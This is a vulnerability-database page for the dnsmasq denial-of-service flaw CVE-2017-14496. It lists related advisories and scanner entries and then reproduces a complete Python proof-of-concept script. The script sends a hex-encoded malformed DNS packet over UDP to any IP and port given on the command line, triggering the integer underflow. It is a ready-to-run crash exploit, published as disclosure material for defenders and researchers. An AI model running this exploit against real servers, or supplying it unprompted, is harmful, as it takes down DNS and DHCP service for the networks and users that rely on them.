Dnsmasq DoS Vulnerability(CVE-2017-14496)

🗓️ 09 Oct 2017 00:00:00Reported by RootType

Dnsmasq DoS Vulnerability(CVE-2017-14496) python script for exploi

Reporter	Title	Published	Views	Family All 117
0day.today	Dnsmasq < 2.78 - Integer Underflow Exploit	2 Oct 201700:00	–	zdt
ALT Linux	Security fix for the ALT Linux 10 package dnsmasq version 2.78-alt1	6 Oct 201700:00	–	altlinux
IBM Security Bulletins	Security Bulletin: Multiple security vulnerabilities in IBM Cloud Manager with OpenStack affect IBM Cloud Orchestrator and Cloud Orchestrator Enterprise	17 Jun 201822:33	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple security vulnerabilities in dnsmasq affect IBM Cloud Manager with OpenStack	8 Aug 201804:13	–	ibm
Tenable Nessus	Amazon Linux 2 : dnsmasq (ALAS-2019-1251)	24 Jul 201900:00	–	nessus
Tenable Nessus	Amazon Linux AMI : dnsmasq (ALAS-2017-907)	3 Oct 201700:00	–	nessus
Tenable Nessus	CentOS 7 : dnsmasq (CESA-2017:2836)	3 Oct 201700:00	–	nessus
Tenable Nessus	Debian DSA-3989-1 : dnsmasq - security update	3 Oct 201700:00	–	nessus
Tenable Nessus	dnsmasq < 2.78 Multiple Remote Vulnerabilities	3 Oct 201700:00	–	nessus
Tenable Nessus	EulerOS 2.0 SP2 : dnsmasq (EulerOS-SA-2018-1285)	27 Sep 201800:00	–	nessus


                                                #!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
#  Fermin J. Serna <[email protected]>
#  Felix Wilhelm <[email protected]>
#  Gabriel Campana <[email protected]>
#  Kevin Hamacher <[email protected]>
#  Gynvael Coldwin <[email protected]>
#  Ron Bowes - Xoogler :/

import socket
import sys

def negative_size_param():
  data = '''00 00 00 00  00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00  00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01  00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08  08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff  ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00  00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00  00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d  06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00  29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00  00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08  08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29  fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9  00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00  00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6  00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
  return data

if __name__ == '__main__':
  if len(sys.argv) != 3:
    print 'Usage: %s <ip> <port>' % sys.argv[0]
    sys.exit(0)

  ip = sys.argv[1]
  port = int(sys.argv[2])

  packet = negative_size_param()

  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
  s.sendto(packet, (ip, port))
  s.close()

09 Oct 2017 00:00Current

8.8High risk

Vulners AI Score8.8

EPSS0.66347